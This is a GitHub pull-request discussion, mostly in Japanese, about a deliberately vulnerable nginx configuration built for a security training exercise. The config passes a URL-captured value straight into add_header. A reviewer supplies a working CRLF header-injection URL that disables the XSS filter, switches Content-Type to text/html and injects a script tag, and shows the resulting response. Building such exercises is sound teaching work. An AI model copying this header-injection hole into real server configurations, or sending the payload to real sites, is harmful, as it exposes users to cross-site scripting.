nginx-http-header-injection/nginx/nginx.conf

```
@@ -0,0 +1,40 @@
+events {}
+
+http {
+    include mime.types;
+
+    default_type application/octet-stream;
+
+    # Update charset_types to match updated mime.types.
+    # text/html is always included by charset module.
+    charset_types
+        text/css
+        text/plain
+        text/vnd.wap.wml
+        application/javascript
+        application/json
+        application/rss+xml
+        application/xml;
+
+    charset utf-8;
+
+    server {
+        listen [::]:80;
+        listen 80;
+
+        location / {
+            root /var/www;
+            index index.php index.html index.htm;
+            try_files $uri $uri/ /index.html;
+        }
+
+        # Header injection code - do not use in production!
+        # See https://github.com/yandex/gixy/blob/master/docs/en/plugins/httpsplitting.md
+        location ~ /v1/((?<action>[^.]*)\.json)?$ {
+            # inject received content
+            add_header X-Action $action;
+            return 200 "OK";
```

```suggestion
            return 200 '{"comment": "This is v1 endpoint.", "url": "http://example.com"}';
```

このような形にしてみるといかがでしょうか。
本番を想定してこのような JSON API を返すようにしてみます。

すると `Content-Length` はこの分だけ返るようになります。
そこで、 HTTPヘッダインジェクションを利用したXSSが可能になります。

`http://localhost/v1/see%0d%0aX-XSS-Protection:%200%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E.json`

レスポンスは次のようになります。

```
HTTP/1.1 200 OK
Server: nginx/1.15.1
Date: Wed, 31 Oct 2018 17:29:42 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 64
Connection: keep-alive
X-Action: see
X-XSS-Protection: 0
Content-Type: text/html

<script>alert(1)</script>

{"comment": "This is v1 endpoint.",
```

`Content-Type:%20text%2fhtml` で Content-Type を `application/json` から `text/html` に変更します。これで `<script>` タグによる XSS を発火できるようになるので、 `%0d%0a%0d%0a` に続いてレスポンスボディとしてXSSペイロードを記述します。

ただし、このままではブラウザのXSSフィルタに邪魔されてしまうので、さらにHTTPヘッダインジェクションを生かして `X-XSS-Protection:%200` でXSSフィルタを無効化するヘッダを入れてあげます。

これで HTTPヘッダインジェクション + XSS が可能となりますが、こういった内容でいかがでしょうか？

---

@mrtc0 早速もりたこさんの提案通りの変更を適用しました。
bodyを変更しようとしたら最初の2文字だけだったのはContent-Lengthのせいだったのですね。
さっそく追試してみます。ありがとうございます!

---

@mrtc0 追試の結果問題なく動作しました。この分の解説を https://github.com/curevuln/curevuln-exercise/pull/22/commits/1c6c0377565ae730feab7b3cbf0edbecd86b7d6a で書き加えました。